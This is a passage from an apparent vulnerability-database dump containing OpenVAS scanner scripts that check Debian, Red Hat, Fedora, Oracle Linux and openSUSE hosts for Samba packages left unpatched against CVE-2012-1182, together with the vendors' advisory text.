15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:56:34 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Debian Security Advisory DSA 2450-1 (samba)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202450-1\");\n script_tag(name:\"insight\", value:\"It was discovered that Samba, the SMB/CIFS file, print, and login server,\ncontained a flaw in the remote procedure call (RPC) code which allowed\nremote code execution as the super user from an unauthenticated\nconnection.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 2:3.5.6~dfsg-3squeeze7.\n\nFor the testing distribution (wheezy), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:3.6.4-1.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your samba packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to samba\nannounced via advisory DSA 2450-1.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"libpam-smbpass\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbclient\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbclient-dev\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libwbclient0\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-common\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-common-bin\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-dbg\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-doc\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-doc-pdf\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-tools\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"smbclient\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"swat\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"winbind\", ver:\"2:3.5.6~dfsg-3squeeze7\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-03T10:57:48", "description": "Check for the Version of samba", "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "openvas", "title": "RedHat Update for samba RHSA-2012:0465-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-03T00:00:00", "id": "OPENVAS:870581", "href": "http://plugins.openvas.org/nasl.php?oid=870581", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2012:0465-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\";\n\ntag_affected = \"samba on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00002.html\");\n script_id(870581);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 10:59:22 +0530 (Wed, 11 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name: \"RHSA\", value: \"2012:0465-01\");\n script_name(\"RedHat Update for samba RHSA-2012:0465-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:57:42", "description": "Check for the Version of samba4", "cvss3": {}, "published": "2012-05-17T00:00:00", "type": "openvas", "title": "Fedora Update for samba4 FEDORA-2012-6382", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-01T00:00:00", "id": "OPENVAS:864238", "href": "http://plugins.openvas.org/nasl.php?oid=864238", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for samba4 FEDORA-2012-6382\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"samba4 on Fedora 16\";\ntag_insight = \"Samba 4 is the ambitious next version of the Samba suite that is being\n developed in parallel to the stable 3.0 series. The main emphasis in\n this branch is support for the Active Directory logon protocols used\n by Windows 2000 and above.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-May/080567.html\");\n script_id(864238);\n script_version(\"$Revision: 8265 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-01 07:29:23 +0100 (Mon, 01 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-05-17 10:31:56 +0530 (Thu, 17 May 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2012-6382\");\n script_name(\"Fedora Update for samba4 FEDORA-2012-6382\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba4\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~38.alpha16.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-23T13:10:36", "description": "Check for the Version of openchange", "cvss3": {}, "published": "2013-02-22T00:00:00", "type": "openvas", "title": "RedHat Update for openchange RHSA-2013:0515-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-23T00:00:00", "id": "OPENVAS:870928", "href": "http://plugins.openvas.org/nasl.php?oid=870928", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openchange RHSA-2013:0515-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n\n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n\n This update also fixes the following bugs:\n\n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n\n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n\n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\";\n\n\ntag_affected = \"openchange on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-February/msg00055.html\");\n script_id(870928);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 10:02:03 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2013:0515-02\");\n script_name(\"RedHat Update for openchange RHSA-2013:0515-02\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of openchange\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi\", rpm:\"evolution-mapi~0.28.3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi-debuginfo\", rpm:\"evolution-mapi-debuginfo~0.28.3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange\", rpm:\"openchange~1.0~4.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-debuginfo\", rpm:\"openchange-debuginfo~1.0~4.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:05", "description": "Oracle Linux Local Security Checks ELSA-2012-0465", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2012-0465", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123940", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123940", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2012-0465.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123940\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:10:36 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2012-0465\");\n script_tag(name:\"insight\", value:\"ELSA-2012-0465 - samba security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2012-0465\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2012-0465.html\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(5|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.0.33~3.39.el5_8\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.5.10~115.el6_2\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-01-02T10:57:41", "description": "Check for the Version of samba", "cvss3": {}, "published": "2012-08-02T00:00:00", "type": "openvas", "title": "SuSE Update for samba openSUSE-SU-2012:0508-1 (samba)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:850289", "href": "http://plugins.openvas.org/nasl.php?oid=850289", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2012_0508_1.nasl 8253 2017-12-28 06:29:51Z teissa $\n#\n# SuSE Update for samba openSUSE-SU-2012:0508-1 (samba)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba upgrade to version 3.6.3 fixes the following\n security issue:\n\n - PIDL based autogenerated code allows overwriting beyond\n of allocated array. Remove attackers could exploit that\n to execute arbitrary code as root (CVE-2012-1182,\n bso#8815, bnc#752797)\n\n Please see /usr/share/doc/packages/samba/WHATSNEW.txt from\n the samba-doc package or the package change log (rpm -q\n --changelog samba) for more details of the version update.\";\n\ntag_affected = \"update on openSUSE 11.4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850289);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-02 23:28:59 +0530 (Thu, 02 Aug 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2012:0508_1\");\n script_name(\"SuSE Update for samba openSUSE-SU-2012:0508-1 (samba)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"ldapsmb\", rpm:\"ldapsmb~1.34b~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb-devel\", rpm:\"libldb-devel~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1\", rpm:\"libldb1~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libldb1-debuginfo\", rpm:\"libldb1-debuginfo~1.0.2~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libnetapi0-debuginfo\", rpm:\"libnetapi0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient0-debuginfo\", rpm:\"libsmbclient0-debuginfo~3.6.3~112.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 